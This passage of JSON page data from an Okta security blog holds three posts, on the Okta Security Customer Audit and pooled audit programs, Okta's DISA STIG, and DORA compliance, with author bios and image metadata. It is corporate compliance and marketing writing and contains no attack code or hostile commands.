solutions that power our Customer Trust efforts.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In this blog, we’ll explore how the Okta Security Customer Audit further enhances the Customer Trust function, driving even greater transparency and confidence in our security practices to meet our customers' regulatory and compliance requirements.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The many benefits of Cloud computing come with the challenge of having reduced visibility into the day-to-day operations of the growing number of applications in today’s tech stacks. The adoption of the identity is the cornerstone of a security program and the new perimeter of technology itself.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"For most customers, reviewing Okta’s generally available documentation meets their requirements. For highly regulated customers, a more detailed audit and more robust documentation may be necessary.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Introducing the program\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As organizations increasingly rely on identity platforms, the need for comprehensive security measures has never been greater. The growing dependence on external vendors, suppliers, and service providers means businesses face a diverse set of supply chain risks that must be carefully managed to maintain a strong security posture.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Okta Security Customer Audit program enables highly regulated customers to view the policies, procedures, and evidence that Okta provides to its auditors and meet regulatory requirements for observing control implementation evidence. Our program is carefully designed to enable audits to occur in a way that ensures equality and that does not expose customers to undue risk.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Working with us\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Through structured assessments, our program provides deep visibility into Okta’s enterprise operations, covering critical areas such as quality control, regulatory compliance, security measures, and performance metrics. These audits are designed to give customers the confidence that Okta’s security practices not only meet, but often exceed, industry standards, empowering them to meet their own regulatory and compliance requirements.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"During an Okta Security Customer Audit, you can expect:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Before an Audit\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our team will execute a thorough review of the Okta processes, documentation, and controls. This may include interviews with key personnel, examination of various records, and observation of operational practices. Our audit team possesses expertise in relevant areas such as quality assurance, compliance, and information security across various industries and regions.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"During an Audit, Pooled edition\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Following the methodical mapping of regulatory controls, we introduced our program's capabilities to a pooled audit function. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Last December, we piloted our Okta Security Pooled Audit program \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"(more on this in a future blog)\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\", which addressed the control requirements defined by the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/05/a-guide-to-dora-compliance-with-okta/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Digital Operational Resiliency Act (DORA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". Our pooled audit resulted in equipping dozens of our EMEA/UK financial services customers with an open-door look into our security program, much like we would share with our own third-party audit functions. Ultimately, we demonstrated the Okta controls meeting customer and regulator requirements, in addition to fostering community. Our attendees had peer-to-peer opportunities to discuss similar industry-related challenges they face in their respective organizations regarding compliance regulations.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"After the Audit\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Post-audit closing activities are crucial for the program's effectiveness. These activities involve following up on the implementation of corrective actions and verifying that Okta has made the necessary improvements to keep both Okta and our customers secure. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"More on our Audit programs\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"While we’re not subjected to every global regulation, we will work closely with our customers to understand their requirements, support them in their efforts to achieve and maintain compliance, and reinforce trust in Okta. \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://support.asqula.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta Docs\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\".\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Later this month, we’re expanding our pooled audit program to help Okta’s Australian customers address new regulations under Australian Prudential Regulatory Authority (APRA) CPS 230, and the existing CPS 234 requirements, which will follow the same program structure. To learn more about our audit programs and how to get involved, contact your account team.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"}},{"updatedAt":"2025-05-09T15:00:07.712Z","slug":"/articles/2025/05/oktas-new-stig","node_locale":"en","date":"2025-05-09T00:00","secAuthor":[{"name":"Rob Gil","slug":"/hackers/rob-gil","jobTitle":"Sr. Director, Federal Architecture","id":"96970804-8b58-5b39-9146-0928bc8a399b","bio":{"bio":"Rob Gil is a Sr. Director, Federal Architecture at Okta and is responsible for leading the Public Sector technology initiatives for FedRAMP, DoD Impact Levels, and StateRAMP. Prior to Okta, Rob worked on the JEDI project for the DoD Cloud Computing Program Office as well as leading the Cloud SecOps team at Elastic. Rob’s work at Elastic helped set the foundations for the Elastic SIEM as an initial core contributor to the Elastic Common Schema and first version of the Elastic SIEM. Before Elastic, Rob led operations and engineering teams at Salesforce and a variety of financial institutions. When not working, Rob enjoys the quiet life on his homestead and dabbling with tech.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/11kEKbX276TFKp9aj2o5MB/798256469b0fb164973e5cb213df4fc6/Rob_Gil_Headshot.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#e8e8e8","width":58,"height":58}}},{"name":"Naveed Mirza","slug":"/hackers/naveed-mirza","jobTitle":"Senior Solutions Architect","id":"110196ee-f45a-5ada-b02c-40d591fa732c","bio":{"bio":"Naveed is a Senior Solutions Architect at Okta, focusing on the DoD and Federal customer base. He has worked in cybersecurity since leaving the US Navy in the late 1990s. Before coming to Okta, Naveed was a consultant for several DoD customers, and he continues to offer advice via active participation in the DoD community. He grew up in Stafford, Virginia, and upon returning from active duty, took up residence there once more. In his free time, he enjoys beer brewing, gaming, and the occasional date night with his wife.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=15&h=16&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=29&h=32&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=58&h=63&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=116&h=126&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=58&h=63&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=15&h=16&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=29&h=32&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=58&h=63&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/6UBnEaJwXGbMNzXI390g4S/4c4c0cad86f4f7da055e92405db05ac2/Naveed_Mirza_Headshot.jpg?w=116&h=126&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#c8d8d8","width":58,"height":63}}},{"name":"Brandon Iske","slug":"/hackers/brandon-iske","jobTitle":"Principal Solutions Architect","id":"76ecc069-7d69-5aa8-a81d-cf72595f683e","bio":{"bio":"Brandon Iske is a Principal Solutions Architect focused on enabling Federal Government and strategic accounts at Okta. He is passionate about strengthening our nation’s cybersecurity and user experience through Identity-focused IT modernization and cyber best practices. Before joining Okta, Brandon worked for over a decade in government public service to deliver and secure joint Department of Defense enterprise capabilities in endpoint security, mobile management, identity and access management, and Zero Trust architecture at the Defense Information Systems Agency. He earned a Bachelor’s Degree in Computer Science from the University of Nebraska at Omaha. He is also a National Science Foundation CyberCorps Scholarship for Service Alumnus and an Okta Certified Professional.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5UjVohmErip1kidEotcSrT/159aad6c3a255e465aed93ecbd75d626/Brandon_Iske_Headshot.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#b8c8c8","width":58,"height":58}}}],"title":"Okta's new Security Technical Implementation Guide (STIG)","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"Okta recently announced our partnership with DISA, which has resulted in the release of the Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG) an an effort to secure baselines for the industry."},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In cybersecurity, identity is the first line of defense. As the number of applications and systems increases, the fatigue of the cyber workforce increases in parallel. Exacerbating this is the increased responsibility on customers to create secure baselines where none exist.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Securing Baselines\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In an effort to create secure baselines, organizations like the Defense Information Systems Agency (DISA) have built publicly available guidance in the form of DISA Security Technical Implementation Guides (STIG). STIGs and Security Requirements Guides for the Department of Defense (DOD) information technology systems are mandated by DODI 8500.01 and provide benefits across the industry. This guidance bridges the gap between the National Institute of Standards and Technology (NIST) Special Publication 800-53 and Risk Management Framework (RMF). STIGs offer significant benefits as it relates to improving IT system security, compliance and resilience.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta and DISA\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta recently announced \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://public.cyber.mil/announcement/disa-releases-the-okta-idaas-security-technical-implementation-guide/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"our partnership with DISA\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", which has resulted in the release of the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG). \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"While this STIG is specific to Okta platforms, the integrations and hardening guidance are standards-based that can be used on any identity platform.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Industry-leader in Identity and Access Management (IAM), Okta is interoperable with various identity platforms and applications, which improves the ease of use when referencing the Okta STIG as a basis for other similar products in today's technological marketplace.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"As the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"first identity vendor to provide this level of configuration guidance\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\", we look forward to continuing our relationship with DISA. By raising the bar for the industry, we're helping create the strongest and most secure guidance possible for securing not only the Okta platforms — but everything they connect to.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Call to Action\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"With the release of this guidance, we encourage all of our customers to evaluate their Okta orgs against the STIG. While some checks such as \\\"banner notifications\\\" may not apply to commercial entities, the remainder of the checks include recommendations for the utmost secure configuration of the Okta platforms.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Okta Identity as a Service (IDaaS) Security Technical Implementation Guide (STIG) is available to download at \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://public.cyber.mil/stigs/downloads/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"https://public.cyber.mil/stigs/downloads/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", search for Okta. If you have feedback on the STIG, please contact fedramp@asqula.com.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"}},{"updatedAt":"2025-06-19T20:58:42.206Z","slug":"/articles/2025/05/a-guide-to-dora-compliance-with-okta","node_locale":"en","date":"2025-05-07T00:00","secAuthor":[{"name":" Aimi Mcilwraith","slug":"/hackers/aimi-mcilwraith","jobTitle":"Senior Security Analyst","id":"9b70b212-4a99-533c-89ce-b03712fa8a5e","bio":{"bio":"Aimi Mcilwraith is a Senior Security Analyst at Okta. The Customer Assurance team within Security Trust & Culture supports Okta’s growing customer base with inquiries pertaining to security and compliance. Backed by over a decade of Security experience working in public and private sector organizations, Aimi has honed a deep understanding of security practices and risk management. CCSK and NIST CSF-certified, she leverages her knowledge and commitment to excellence in safeguarding digital environments to support customers globally from the EMEA region. In her downtime, Aimi enjoys reading and attending concerts.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=58&h=58&q=50&fm=png","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=15&h=15&q=50&fm=png 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=29&h=29&q=50&fm=png 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=58&h=58&q=50&fm=png 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/76IKtgl63E2LTBz7eNiiTr/20a6d30a4e00103bcf721f634afe2754/Aimi_Mcilwraith.png?w=116&h=116&q=50&fm=png 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#e8a898","width":58,"height":58}}}],"title":"A Guide to DORA Compliance with Okta","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"This blog article provides a brief overview of the DORA regulation, outlines how Okta can support compliance adherence, and introduces our new Factsheet, a helpful resource for satisfying DORA's regulated requirements."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This blog article provides a brief overview of the DORA regulation, outlines how Okta can support compliance adherence, and introduces our new Factsheet, a helpful resource for satisfying DORA's regulated requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is DORA?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.eiopa.europa.eu/digital-operational-resilience-act-dora_en\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Operational Resilience Act\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (Regulation (EU) 2022/2554), most commonly known as DORA, became applicable in January 2025 and addresses a critical gap in EU financial regulation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With the introduction of DORA, financial institutions must follow stringent guidelines for safeguarding against ICT-related incidents. These include measures for protection, detection, containment, recovery, and repair. DORA explicitly targets ICT risks, introducing clear rules for ICT risk management, incident reporting, operational resilience testing, and oversight of ICT third-party risks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How does Okta support regulated customers?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to supporting our regulated customers in adhering to DORA regulatory compliance. To guide our customers in adhering to DORA requirements with Okta, we’ve recently released a helpful resource: the new \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/?itemUid=72d0d5d6-8cc8-4333-91d4-743159aba9f4&source=click\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"DORA Compliance with Okta\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Factsheet\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This factsheet provides valuable information that regulated customers can reference in their compliance efforts, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An Introduction to the Key DORA Domains\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This section provides an overview of the five key DORA domains and a high-level view of how Okta’s controls, processes, and supporting documentation can help regulated customers achieve domain requirements. Customers can reference this to review Okta’s compliance information in alignment with the DORA requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can Okta help?\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This section highlights some of the many Okta features that are critical components of a highly available, resilient and secure identity platform. Customers can reference the information and links within this section to perform a thorough assessment of Okta’s security posture as it applies to their own DORA regulatory requirements. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detailed DORA Article mapping \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Lastly, this section proactively maps the DORA domains and applicable DORA Articles with corresponding Okta Control Library Supporting Information for easy reference. Okta’s Control Library supports customers with a comprehensive collection of security controls adopted by our organization to protect systems and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on Compliance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As highlighted in our DORA Compliance with Okta Factsheet, Okta upholds a strong compliance framework to demonstrate our commitment to maintaining highly available, secure and resilient products and services - many of the DORA requirements are business as usual.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A key component of our methodical customer support is making the information they require readily available. We publish our latest independent audit reports and other related documents on the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.asqula.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and all available documentation is accessible to customers and prospects of Okta. Site visitors can view Okta’s certifications and access industry-standard questionnaires. To learn more about our efforts, read our blog article, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Empowering Security with Customer Trust Solutions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Keep watching as we publish additional helpful resources; more to come.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Disclaimer: \",\"marks\":[{\"type\":\"italic\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"While this article discusses certain legal concepts, it does not 